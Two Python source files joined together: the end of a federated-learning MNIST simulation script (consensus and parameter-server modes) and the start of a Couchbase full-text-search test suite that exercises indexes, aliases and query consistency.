while remainings != 0:
i = np.random.randint(devices)
if samples[i] + step >= 0:
samples[i] += step
remainings -= step
return samples
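# Hedged usage sketch (not part of the original file): draw a random non-iid assignment of 1500
# samples across 3 devices; the returned sizes always sum back to the requested total.
# sizes = get_noniid_data(total_training_size=1500, devices=3, batch_size=100)
# assert np.sum(sizes) == 1500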
####
def preprocess_observation(obs, batch_size):
img = obs # crop and downsize
img = img.astype(float) # np.float is deprecated; the builtin float keeps float64 behaviour
return img.reshape(batch_size, 28, 28, 1)
def create_q_model():
# Small CNN classifier; the architecture depends on the -modelselection argument (0: LeNet-1)
inputs = layers.Input(shape=(28, 28, 1,))
if condition == 0:
# lenet - 1
layer1 = layers.Conv2D(4, kernel_size=(5, 5), activation="relu")(inputs)
layer2 = layers.AveragePooling2D(pool_size=(2, 2))(layer1)
layer3 = layers.Conv2D(8, kernel_size=(5, 5), activation="relu")(layer2)
layer4 = layers.AveragePooling2D(pool_size=(2, 2))(layer3)
layer5 = layers.Flatten()(layer4)
elif condition == 1:
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(inputs)
layer2 = layers.MaxPooling2D(pool_size=(2, 2))(layer1)
layer3 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(layer2)
layer4 = layers.MaxPooling2D(pool_size=(2, 2))(layer3)
layer5 = layers.Flatten()(layer4)
else:
layer1 = layers.Conv2D(14, kernel_size=(3, 3), activation="relu")(inputs)
layer2 = layers.MaxPooling2D(pool_size=(2, 2))(layer1)
layer3 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(layer2)
layer4 = layers.MaxPooling2D(pool_size=(2, 2))(layer3)
layer5 = layers.Flatten()(layer4)
# Convolutions
# layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs)
# layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1)
# layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2)
#
# layer4 = layers.Flatten()(layer3)
#
# layer5 = layers.Dense(512, activation="relu")(layer4)
classification = layers.Dense(n_outputs, activation="softmax")(layer5)
return keras.Model(inputs=inputs, outputs=classification)
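# Hedged usage sketch (not part of the original file): build the selected classifier and inspect
# it; with the default condition == 0 this is the LeNet-1 style network defined above.
# demo_model = create_q_model()
# demo_model.summary()
# demo_model.output_shape # expected: (None, 10)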
def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1):
model_global = create_q_model()
model_parameters_initial = np.asarray(model_global.get_weights())
parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round, indexes_tx)
global_target_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
epoch_count = 0
np.save(global_target_model, model_parameters_initial)
np.save(global_epoch, epoch_count)
pause(2) # wait for neighbors
while True:
pause(refresh_server) # refresh global model on every xx seconds
fileList = glob.glob('*.mat', recursive=False)
if len(fileList) == devices:
# stop the server
break
else:
np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch_count, aggregation_type=0))
epoch_count += 1
np.save(global_epoch, epoch_count)
# execute for each deployed device
def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution):
pause(5) # PS server (if any) starts first
checkpointpath1 = 'results/model{}.h5'.format(device_index)
outfile = 'results/dump_train_variables{}.npz'.format(device_index)
outfile_models = 'results/dump_train_model{}.npy'.format(device_index)
global_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
np.random.seed(1)
tf.random.set_seed(1) # common initialization
learning_rate = args.mu
learning_rate_local = learning_rate
B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices)
Probabilities = B[device_index, :]/(devices - 1)
training_signal = False
# check for backup variables on start
if os.path.isfile(checkpointpath1):
train_start = False
# backup the model and the model target
model = models.load_model(checkpointpath1)
data_history = []
label_history = []
local_model_parameters = np.load(outfile_models, allow_pickle=True)
model.set_weights(local_model_parameters.tolist())
dump_vars = np.load(outfile, allow_pickle=True)
frame_count = dump_vars['frame_count']
epoch_loss_history = dump_vars['epoch_loss_history'].tolist()
running_loss = np.mean(epoch_loss_history[-5:])
epoch_count = dump_vars['epoch_count']
else:
train_start = True
model = create_q_model()
data_history = []
label_history = []
frame_count = 0
# Experience replay buffers
epoch_loss_history = []
epoch_count = 0
running_loss = math.inf
if parameter_server:
epoch_global = 0
training_end = False
a = model.get_weights()
# set an arbitrary optimizer, here Adam is used
optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
# create a data object (here radar data)
# start = time.time()
# data_handle = MnistData(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
if args.noniid_assignment == 1:
data_handle = MnistData_task(device_index, start_samples, samples, full_data_size,
args.random_data_distribution)
else:
data_handle = MnistData(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
# end = time.time()
# time_count = (end - start)
# print("Training time", time_count)
# create a consensus object
cfa_consensus = CFA_process(devices, device_index, args.N)
while True: # Run until solved
# collect 1 batch
frame_count += 1
obs, labels = data_handle.getTrainingData(batch_size)
data_batch = preprocess_observation(obs, batch_size)
# Save data and labels in the current learning session
data_history.append(data_batch)
label_history.append(labels)
if frame_count % number_of_batches == 0:
if not parameter_server:
epoch_count += 1
# check scheduling for federated
if federated:
if epoch_count == 1 or scheduling_tx[device_index, epoch_count] == 1:
training_signal = False
else:
# stop all computing, just save the previous model
training_signal = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# check scheduling for parameter server
if parameter_server:
while not os.path.isfile(global_epoch):
# wait for the parameter server to publish the global epoch counter
print("waiting")
pause(1)
try:
epoch_global = np.load(global_epoch, allow_pickle=True)
except:
pause(5)
print("retrying opening global epoch counter")
try:
epoch_global = np.load(global_epoch, allow_pickle=True)
except:
print("failed reading global epoch")
if epoch_global == 0:
training_signal = False
elif scheduling_tx[device_index, epoch_global] == 1:
if epoch_global > epoch_count:
epoch_count = epoch_global
training_signal = False
else:
training_signal = True
else:
# stop all computing, just save the previous model
training_signal = True
# always refresh the local model using the PS one
stop_aggregation = False
while not os.path.isfile(global_model):
# wait for the parameter server to publish the global model
print("waiting")
pause(1)
try:
model_global = np.load(global_model, allow_pickle=True)
except:
pause(5)
print("retrying opening global model")
try:
model_global = np.load(global_model, allow_pickle=True)
except:
print("halting aggregation")
stop_aggregation = True
if not stop_aggregation:
model.set_weights(model_global.tolist())
if training_signal:
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# check scheduling for parameter server
# Local learning update every "number of batches" batches
time_count = 0
if frame_count % number_of_batches == 0 and not training_signal:
# run local batches
for i in range(number_of_batches):
start = time.time()
data_sample = np.array(data_history[i])
label_sample = np.array(label_history[i])
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
with tf.GradientTape() as tape:
# Train the model on data samples
classes = model(data_sample, training=False)
# Calculate loss
loss = tf.reduce_mean(-tf.reduce_sum(masks * tf.math.log(classes), axis=1))
# Backpropagation
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
end = time.time()
time_count = time_count + (end-start)/number_of_batches
if not parameter_server and not federated:
print('Average batch training time {:.2f}'.format(time_count))
del data_history
del label_history
data_history = []
label_history = []
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# Consensus round
# update local model
cfa_consensus.update_local_model(model_weights)
# neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
if not train_start:
if federated and not training_signal:
eps_c = 1 / (args.N + 1)
# apply consensus for model parameter
# neighbor = np.random.choice(np.arange(devices), args.N, p=Probabilities, replace=False) # choose neighbor
neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N, replace=False) # choose neighbor
while neighbor == device_index:
neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N,
replace=False) # choose neighbor
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag))
if cfa_consensus.getTrainingStatusFromNeightbor():
# a neighbor completed the training, with loss < target, transfer learning is thus applied (the device will copy and reuse the same model)
training_signal = True # stop local learning, just do validation
else:
print("Warm up")
train_start = False
# check if parameter server is enabled
# stop_aggregation = False
del model_weights
#start = time.time()
# validation tool for device 'device_index'
if epoch_count > validation_start and frame_count % number_of_batches == 0:
avg_cost = 0.
for i in range(number_of_batches_for_validation):
obs_valid, labels_valid = data_handle.getTestData(batch_size, i)
# obs_valid, labels_valid = data_handle.getRandomTestData(batch_size)
data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size)
data_sample = np.array(data_valid)
label_sample = np.array(labels_valid)
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
classes = model(data_sample, training=False)
# Calculate loss
# loss = loss_function(label_sample, classes)
loss = tf.reduce_mean(-tf.reduce_sum(masks * tf.math.log(classes), axis=1)).numpy()
avg_cost += loss / number_of_batches_for_validation # Training loss
epoch_loss_history.append(avg_cost)
print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count,
avg_cost))
# loss over the most recent validation epoch
running_loss = np.mean(epoch_loss_history[-1:])
#end = time.time()
#time_count = (end - start)
#print(time_count)
if running_loss < target_loss: # Condition to consider the task solved
print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA1_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment,args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA1_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size), dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if epoch_count > max_epochs: # stop simulation
print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA1_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA1_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if __name__ == "__main__":
if args.resume == 0: # clear all files
# DELETE TEMPORARY CACHE FILES
fileList = glob.glob('results/*.npy', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.h5', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.npz', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('*.mat', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
# main loop for multiprocessing
t = []
############# enable consensus based federation #######################
# federated = False
# federated = True
########################################################
##################### enable parameter server ##############
# parameter_server = False
server_index = devices
# parameter_server = True
#########################################################
samples = np.zeros(devices) # training samples per device
for id in range(devices):
# samples[id]=math.floor(w[id]*validation_train)
# samples[id] = math.floor(balancing_vect[id]*fraction_training)
samples[id] = training_set_per_device
# samples = int(fraction_training/devices) # training samples per device
######################### Create a non-iid assignment ##########################
# if args.noniid_assignment == 1:
# total_training_size = training_set_per_device * devices
# samples = get_noniid_data(total_training_size, devices, batch_size)
# while np.min(samples) < batch_size:
# samples = get_noniid_data(total_training_size, devices, batch_size)
#############################################################################
print(samples)
#################################### code testing CL learning (0: data center)
# federated = False
# parameter_server = False
# processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server)
######################################################################################
if federated or parameter_server:
for ii in range(devices):
# position start
if ii == 0:
start_index = 0
else:
start_index = start_index + int(samples[ii-1])
t.append(threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples)))
t[ii].start()
# last process is for the target server
if parameter_server:
print("Target server starting with active devices {}".format(active_devices_per_round))
t.append(threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated)))
t[devices].start()
else: # run centralized learning on device 0 (data center)
processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples)
exit(0)
|
stable_topology_fts.py
|
# coding=utf-8
import copy
import json
import random
from threading import Thread
import Geohash
from membase.helper.cluster_helper import ClusterOperationHelper
from remote.remote_util import RemoteMachineShellConnection
from TestInput import TestInputSingleton
from .fts_base import FTSBaseTest
from lib.membase.api.exception import FTSException, ServerUnavailableException
from lib.membase.api.rest_client import RestConnection
class StableTopFTS(FTSBaseTest):
def suite_setUp(self):
pass
def suite_tearDown(self):
pass
def setUp(self):
super(StableTopFTS, self).setUp()
def tearDown(self):
super(StableTopFTS, self).tearDown()
def check_fts_service_started(self):
try:
rest = RestConnection(self._cb_cluster.get_random_fts_node())
rest.get_fts_index_definition("invalid_index")
except ServerUnavailableException as e:
raise FTSException("FTS service has not started: %s" %e)
def create_simple_default_index(self):
plan_params = self.construct_plan_params()
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items//2)
self.create_fts_indexes_all_buckets(plan_params=plan_params)
if self._update or self._delete:
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
def test_index_docvalues_option(self):
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.load_data()
self.wait_for_indexing_complete()
if float(self.get_zap_docvalue_disksize()) != float(0):
self.fail("zap files size with docvalue not empty with docValues = False")
else:
self.log.info(" zap files size found to be : {0}".format(self.get_zap_docvalue_disksize()))
index.update_docvalues_email_custom_index(True)
self.wait_for_indexing_complete()
if float(self.get_zap_docvalue_disksize()) == float(0):
self.fail("zap files size with docvalue found to be empty with docValues = True")
else:
self.log.info(" zap files size found to be : {0}".format(self.get_zap_docvalue_disksize()))
def test_maxttl_setting(self):
self.create_simple_default_index()
maxttl = int(self._input.param("maxttl", None))
self.sleep(maxttl,
"Waiting for expiration at the elapse of bucket maxttl")
self._cb_cluster.run_expiry_pager()
self.wait_for_indexing_complete(item_count=0)
self.validate_index_count(must_equal=0)
for index in self._cb_cluster.get_indexes():
query = eval(self._input.param("query", str(self.sample_query)))
hits, _, _, _ = index.execute_query(query,
zero_results_ok=True,
expected_hits=0)
self.log.info("Hits: %s" % hits)
def query_in_dgm(self):
self.create_simple_default_index()
for index in self._cb_cluster.get_indexes():
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def run_default_index_query(self, query=None, expected_hits=None, expected_no_of_results=None):
self.create_simple_default_index()
zero_results_ok = True
if not expected_hits:
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
if not query:
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
if expected_no_of_results is None:
expected_no_of_results = self._input.param("expected_no_of_results", None)
for index in self._cb_cluster.get_indexes():
hits, matches, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
expected_no_of_results=expected_no_of_results)
self.log.info("Hits: %s" % hits)
#self.log.info("Matches: %s" % matches)
def test_query_type(self):
"""
uses RQG
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
def test_query_type_on_alias(self):
"""
uses RQG
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
alias = self.create_alias([index])
self.generate_random_queries(alias, self.num_queries, self.query_types)
self.run_query_and_compare(alias)
def test_match_all(self):
self.run_default_index_query(query={"match_all": {}},
expected_hits=self._num_items)
def test_match_none(self):
self.run_default_index_query(query={"match_none": {}},
expected_hits=0)
def test_match_consistency(self):
query = {"match_all": {}}
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors
)
self.log.info("Hits: %s" % hits)
for i in range(list(list(self.consistency_vectors.values())[0].values())[0]):
self.async_perform_update_delete(self.upd_del_fields)
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=self._num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_match_consistency_error(self):
query = {"match_all": {}}
fts_node = self._cb_cluster.get_random_fts_node()
service_map = RestConnection(self._cb_cluster.get_master_node()).get_nodes_services()
# select FTS node to shutdown
for node_ip, services in list(service_map.items()):
ip = node_ip.split(':')[0]
node = self._cb_cluster.get_node(ip, node_ip.split(':')[1])
if node and 'fts' in services and 'kv' not in services:
fts_node = node
break
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
try:
from .fts_base import NodeHelper
NodeHelper.stop_couchbase(fts_node)
for i in range(list(list(self.consistency_vectors.values())[0].values())[0]):
self.async_perform_update_delete(self.upd_del_fields)
finally:
NodeHelper.start_couchbase(fts_node)
NodeHelper.wait_service_started(fts_node)
self.sleep(10)
# "status":"remote consistency error" => expected_hits=-1
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=-1,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
ClusterOperationHelper.wait_for_ns_servers_or_assert([fts_node], self, wait_if_warmup=True)
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=self._num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_match_consistency_long_timeout(self):
timeout = self._input.param("timeout", None)
query = {"match_all": {}}
self.create_simple_default_index()
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=0,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
tasks = []
for i in range(list(list(self.consistency_vectors.values())[0].values())[0]):
tasks.append(Thread(target=self.async_perform_update_delete, args=(self.upd_del_fields,)))
for task in tasks:
task.start()
num_items = self._num_items
if timeout is None or timeout <= 60000:
# Here we assume that the update takes more than 60 seconds
# when we use timeout <= 60 sec we get timeout error
# with None we have 60s by default
num_items = 0
try:
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=num_items,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors,
timeout=timeout)
finally:
for task in tasks:
task.join()
self.log.info("Hits: %s" % hits)
def index_utf16_dataset(self):
self.load_utf16_data()
try:
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
# an exception will most likely be thrown from waiting
self.wait_for_indexing_complete()
self.validate_index_count(
equal_bucket_doc_count=False,
zero_rows_ok=True,
must_equal=0)
except Exception as e:
raise FTSException("Exception thrown in utf-16 test :{0}".format(e))
def create_simple_alias(self):
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
hits, _, _, _ = index.execute_query(self.sample_query,
zero_results_ok=False)
alias = self.create_alias([index])
hits2, _, _, _ = alias.execute_query(self.sample_query,
zero_results_ok=False)
if hits != hits2:
self.fail("Index query yields {0} hits while alias on same index "
"yields only {1} hits".format(hits, hits2))
return index, alias
def create_query_alias_on_multiple_indexes(self):
#delete default bucket
self._cb_cluster.delete_bucket("default")
# create "emp" bucket
self._cb_cluster.create_standard_buckets(bucket_size=1000,
name="emp",
num_replicas=0)
emp = self._cb_cluster.get_bucket_by_name('emp')
# create "wiki" bucket
self._cb_cluster.create_standard_buckets(bucket_size=1000,
name="wiki",
num_replicas=0)
wiki = self._cb_cluster.get_bucket_by_name('wiki')
#load emp dataset into emp bucket
emp_gen = self.get_generator(dataset="emp", num_items=self._num_items)
wiki_gen = self.get_generator(dataset="wiki", num_items=self._num_items)
if self.es:
# make deep copies of the generators
import copy
emp_gen_copy = copy.deepcopy(emp_gen)
wiki_gen_copy = copy.deepcopy(wiki_gen)
load_tasks = self._cb_cluster.async_load_bucket_from_generator(
bucket=emp,
kv_gen=emp_gen)
load_tasks += self._cb_cluster.async_load_bucket_from_generator(
bucket=wiki,
kv_gen=wiki_gen)
if self.es:
# create empty ES indexes
self.es.create_empty_index("emp_es_index")
self.es.create_empty_index("wiki_es_index")
load_tasks.append(self.es.async_bulk_load_ES(index_name='emp_es_index',
gen=emp_gen_copy,
op_type='create'))
load_tasks.append(self.es.async_bulk_load_ES(index_name='wiki_es_index',
gen=wiki_gen_copy,
op_type='create'))
for task in load_tasks:
task.result()
# create indexes on both buckets
emp_index = self.create_index(emp, "emp_index")
wiki_index = self.create_index(wiki, "wiki_index")
self.wait_for_indexing_complete()
# create compound alias
alias = self.create_alias(target_indexes=[emp_index, wiki_index],
name="emp_wiki_alias")
if self.es:
self.es.create_alias(name="emp_wiki_es_alias",
indexes=["emp_es_index", "wiki_es_index"])
# run rqg on the alias
self.generate_random_queries(alias, self.num_queries, self.query_types)
self.run_query_and_compare(alias, es_index_name="emp_wiki_es_alias")
def index_wiki(self):
self.load_wiki(lang=self.lang)
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "wiki_index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
def delete_index_then_query(self):
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self._cb_cluster.delete_fts_index(index.name)
try:
hits2, _, _, _ = index.execute_query(self.sample_query)
except Exception as e:
# expected, pass test
self.log.info("Expected exception: {0}".format(e))
def drop_bucket_check_index(self):
count = 0
self.load_data()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self._cb_cluster.delete_bucket("default")
self.sleep(20, "waiting for bucket deletion to be known by fts")
try:
count = index.get_indexed_doc_count()
except Exception as e:
self.log.info("Expected exception: {0}".format(e))
# at this point, index has been deleted,
# remove index from list of indexes
self._cb_cluster.get_indexes().remove(index)
if count:
self.fail("Able to retrieve index json from index "
"built on bucket that was deleted")
def delete_index_having_alias(self):
index, alias = self.create_simple_alias()
self._cb_cluster.delete_fts_index(index.name)
hits, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits))
if hits >= 0:
self.fail("Query alias with deleted target returns query results!")
def delete_index_having_alias_recreate_index_query(self):
index, alias = self.create_simple_alias()
hits1, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits1))
index.delete()
self.log.info("Recreating deleted index ...")
bucket = self._cb_cluster.get_bucket_by_name('default')
self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
hits2, _, _, _ = alias.execute_query(self.sample_query)
self.log.info("Hits: {0}".format(hits2))
if hits1 != hits2:
self.fail("Hits from alias before index recreation: %s,"
" after recreation: %s" %(hits1, hits2))
def create_alias_on_deleted_index(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, "default_index")
self.wait_for_indexing_complete()
from .fts_base import INDEX_DEFAULTS
alias_def = INDEX_DEFAULTS.ALIAS_DEFINITION
alias_def['targets'][index.name] = {}
alias_def['targets'][index.name]['indexUUID'] = index.get_uuid()
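        # the alias definition pins the target index by UUID; once the index is
        # deleted below, creating an alias against it is expected to fail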
index.delete()
try:
self.create_alias([index], alias_def)
self.fail("Was able to create alias on deleted target")
except Exception as e:
self.log.info("Expected exception :{0}".format(e))
def edit_index_new_name(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
index.name = "new_index"
try:
index.update()
except Exception as e:
self.log.info("Expected exception: {0}".format(e))
def edit_index(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
#hits, _, _, _ = index.execute_query(self.sample_query)
new_plan_param = {"maxPartitionsPerPIndex": 30}
self.partitions_per_pindex = 30
index.index_definition['planParams'] = \
index.build_custom_plan_params(new_plan_param)
